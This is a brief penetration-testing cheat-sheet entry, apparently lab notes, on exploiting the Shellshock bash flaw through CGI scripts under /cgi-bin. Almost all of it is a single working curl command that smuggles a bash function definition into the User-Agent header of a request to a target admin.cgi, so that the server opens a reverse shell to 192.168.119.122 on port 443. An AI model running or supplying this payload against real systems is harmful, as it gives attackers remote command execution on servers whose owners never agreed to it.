Usually exploitable when cgi scripts are available under /cgi-bin

Reverse shell via curl :

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.119.122/443 0>&1' <http://10.11.1.71/cgi-bin/admin.cgi>